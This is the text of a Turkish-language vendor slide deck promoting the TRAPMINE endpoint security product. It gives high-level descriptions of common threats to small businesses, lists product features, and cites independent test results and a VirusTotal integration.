KOBİ’leri Hedef Alan Yeni Nesil Tehditler ve Önlemler
trapmine.com
2
KOBILERI HEDEF ALAN 5 SIBER TEHDIT
3
• Advanced Persistent Threat
• An advanced persistent threat is an attack in which an unauthorized user gains access to a system or network and remains there for an extended period of time without being detected.
• Spear Phishing
• Spear phishing is the act of sending and emails to specific and well-researched targets while purporting to be a trusted sender. The aim is to either infect devices with malware or convince victims to hand over information or money.
• Unknown and Known Malware
• Unknown malware is just that malware that has not been discovered yet. These types of attacks are known as zero-day attacks.
• Pass-The-Hash Attacks
• A Pass-the-Hash (PtH) attack is a technique whereby an attacker captures a password hash (as opposed to the password characters) and then simply passes it through for authentication and potentially lateral access to other networked systems.
• Ransomware
• Ransomware is malicious software that infects your computer and displays messages demanding a fee to be paid in order for your system to work again. This class of malware is a criminal moneymaking scheme that can be installed through deceptive links in an email message, instant message or website.
MODERN TEHDİTLERİN ANATOMİSİ
User opens
a Word Document
Executes Powershell scripts/Malware
Final MS Office document
exploits a vulnerability Finds and extracts data
4
GELENEKSEL GÜVENLİK ÇÖZÜMLERİ NEDEN BAŞARISIZ OLUYOR?
5
Detection and Response Prevent Known and
Unknown Malware
Prevent Non-Malware Attacks
Endpoint Visibility Cloud Intelligence and
Machine Learning Lightweight and
Easy-to-Deploy
YENİ NESİL UÇ NOKTA GÜVENLİĞİ
6
7
TRAPMINE v4.0: YENİ NESİL UÇ NOKTA GÜVENLİĞİ
▪ Multi-Vectoral Malware Engine
▪ Reputational Detection Engine
▪ Machine Learning/AI Based Detection Engine
▪ Behavioral Detection Engine
▪ Detection Analysis
▪ Root Cause Analysis
▪ Related Alert Analysis
▪ Attack Time Line Analysis
▪ MITRE ATT&CK® Integration
▪ Advanced Detection and Protection Policies
▪ Device Controller Policies
▪ Device Controller Logs
▪ Application Control Policies
▪ Blacklist Policies
▪ White List Policies
▪ Compromise Assesment
▪ Live Hunting
▪ Automated Hunting
▪ Anti-Exploit and Advanced Threat Protection
DAVRANIŞSAL ANALİZ
8
YAPAY ZEKA
9
MODEL
EVALUATE INREAL-LIFE
EXTRACT FEATURES
TRAIN MODEL
v
MALICIOUS FILES
BENIGN FILES
ACCUMULATING SAMPLES
UPDATE FEATURES
TEHDİT AVCILIĞI VE OLAYA MÜDEHALE
10
Live Query Artifacts
Running Processes File by Name
File by Hash Registry Values OS Startup Entries Powershell v3+ History Active Mutexes and Events
Injected Threads ... more
TRAPMINE ESM
THREAT HUNTING and INCIDENT RESPONSE MODULE
v
TRAPMINE Agents
(Desktops, Notebooks, Servers, etc.)
Live Response
smss.exe csrss.exe wininit.exe services.exe
lsass.exe svchost.exe WUDFHost.exe
Live Request
Example: Running Processes
Live Action
Example: Kill Process, Block Process, Download Process, Get Process Dump
PREVENTION EFFICACY 100 %
BAĞIMSIZ TEST SONUÇLARI
• TRAPMINE achieves %100 prevention against in-the- wild and custom threats!
• TRAPMINE has been certified by UK-based
independent test lab MRG-Effitas for its effective protection againt cyber threats.
* https://www.mrg-effitas.com/wp-content/uploads/2017/08/MRG-Effitas-Trapmine_v105.pdf
* https://www.mrg-effitas.com/wp-content/uploads/2018/08/TRAPMINE_ML_report.pdf
11
12
GOOGLE VIRUSTOTAL’E ENTEGRE OLAN ILK YERLI COZUM
13
We welcome Trapmine scanner to VirusTotal. In the words of the company:
“Trapmine ThreatScore is a machine learning-powered malware detection engine developed to identify known and never-before-seen malware. This engine is a part of TRAPMINE Endpoint Detection & Protection Platform. Trapmine combines machine learning, behavior monitoring and endpoint deception techniques to provide fool-proof defense against malware, exploit attempts, file-less malware, ransomware and other forms of targeted attacks. Windows PE files submitted to VirusTotal will be analyzed by Trapmine ML engine and the verdicts will be displayed to VirusTotal users.”
Trapmine has expressed its commitment to follow the recommendations of AMTSO and, in compliance with our policy, facilitates this review by MRG Effitas, an AMTSO-member tester.